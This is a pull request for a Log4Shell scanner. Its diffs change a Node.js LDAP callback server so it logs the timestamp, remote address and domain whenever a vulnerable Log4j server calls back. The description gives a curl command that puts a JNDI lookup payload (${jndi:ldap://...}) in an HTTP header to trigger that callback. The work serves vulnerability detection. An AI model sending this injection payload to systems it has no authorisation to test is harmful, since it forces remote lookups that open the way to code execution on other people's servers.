### PR TITLE
feat: catch domain name from after call

### DIFF
--- a/scanners/log4shell-processor/index.js
+++ b/scanners/log4shell-processor/index.js
@@ -4,11 +4,16 @@ const { NODE_ENV } = process.env
 
 ;(async () => {
   const server = ldap.createServer()
-  server.after(function (req, res, next) {
-    if (req.dn.toString() != '' && req.dn.toString() != 'cn=anonymous') {
+  server.after(function (req, _res, next) {
+    if (req.dn.toString() !== '' && req.dn.toString() !== 'cn=anonymous') {
       // Do the thing
-      let domain = req.dn.toString().split('=')[1]
-      console.log(`Server is ${domain}`)
+      const domain = req.dn.toString().split('=')[1]
+      console.log({
+        timestamp: Date.now(),
+        remoteAddress: req.connection.remoteAddress,
+        remoteport: req.connection.remotePort,
+        domain: domain,
+      })
     }
     return next()
   })

--- a/scanners/log4shell-processor/index.js
+++ b/scanners/log4shell-processor/index.js
@@ -4,18 +4,13 @@ const { NODE_ENV } = process.env
 
 ;(async () => {
   const server = ldap.createServer()
-
-  server.search('c=log4shelltest', (req, res) => {
-    console.log({
-      timestamp: Date.now(),
-      remoteAddress: req.connection.remoteAddress,
-      remoteport: req.connection.remotePort
-      // query: req.dn.toString(),
-      // scope: req.scope,
-      // filter: req.filter.toString(),
-    })
-
-    res.end()
+  server.after(function (req, res, next) {
+    if (req.dn.toString() != '' && req.dn.toString() != 'cn=anonymous') {
+      // Do the thing
+      let domain = req.dn.toString().split('=')[1]
+      console.log(`Server is ${domain}`)
+    }
+    return next()
   })
 
   server.listen(1389, () => {


### PR DESCRIPTION
Adds a bit of a terrible way to catch the domain name from the LDAP request coming back from the Log4J server

this should work on an exploited server

```
curl server:8080 -H 'X-Api-Version: ${jndi:ldap://app:1389/cn=canada.ca}'
```